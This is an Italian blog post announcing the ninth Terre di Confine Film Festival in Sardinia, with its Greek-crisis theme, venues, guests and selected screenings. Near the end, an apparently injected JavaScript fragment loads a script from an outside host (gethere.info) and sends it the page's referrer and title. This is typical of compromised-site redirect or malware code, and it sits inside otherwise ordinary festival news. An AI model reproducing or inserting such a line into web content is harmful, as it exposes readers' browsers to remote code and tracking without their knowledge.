Terre di Confine Film Festival IX edizione

In Sardegna è in corso questo mese il Terre di Confine Film Festival, organizzato dall’associazione culturale Su Disterru e giunto alla sua nona edizione.

Lo spirito del festival è dare voce a realtà cinematografiche caratterizzate dalla marginalità, che vivono nel segno del confine, fisico o concettuale, favorirne l’incontro, lo scambio. Il confronto conduce all’esplorazione di diverse forme di cinema, che pur tra le difficoltà riescono a raggiungere un grande spessore artistico e ad affascinare l’immaginazione.

Terre di Confine Film Festival IX edizione

Tema dell’edizione di quest’anno è la Grecia, in particolare la narrazione della crisi dal punto di vista della cinematografia ellenica. La sezione storica “Finestra sul cinema sardo”, costante del Festival, sarà anch’essa dedicata ai temi della crisi e della migrazione, con ospiti i registi sardi Mario Piredda, Francesco Piras, Marco Antonio Pani, Simone Cireddu e Salvatore Mereu. Il direttore artistico dell’edizione è il regista Paolo Zucca, che noi FEMS ricordiamo con molta stima dalla nostra intervista sul suo film L’Arbitro alla Mostra del Cinema di Venezia nel 2013.

Terre di Confine Film Festival dà vita a tre piccoli centri della Sardegna nel corso di tre weekend, con oltre 30 proiezioni, 16 incontri, più di 20 ospiti, 2 mostre, un concerto, laboratori nelle scuole, un convegno e due tavole rotonde. La prima parte si è svolta a Solarussa il 4 e 5 Marzo, mentre da oggi 11 Marzo fino al 13 il festival sarà a Asuni, per poi spostarsi a Narbolia per il weekend conclusivo dal 18 al 20 Marzo. Un’occasione per esplorazioni sia cinematografiche che geografiche. Qui il programma del festival, non perdetevelo!

Ad Asuni, segnaliamo particolarmente la tavola rotonda Xenia, con Asimina Proedrou, Alessandro Penso, Margarita Manda e Amedeo Pagani sul tema delle dinamiche innestate dalle migrazioni verso l’Europa, il 13 Marzo al Museo dell’Emigrazione. Inoltre, sempre al Museo dell’Emigrazione, la Mostra fotografica European Dream di Alessandro Penso.

Segnaliamo inoltre domani 12 Marzo alle 18.30 la proiezione del documentario Indebito di Vinicio Capossela e Andrea Segre, riflessione sulla crisi e sulla decrescita consapevole guidata dalle note del genere musicale greco Rebetiko.

Torneremo al Terre di Confine Film Festival la prossima settimana per presentarvi le giornate a Narbolia. Nel frattempo, buona visione!

Joannas.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share This: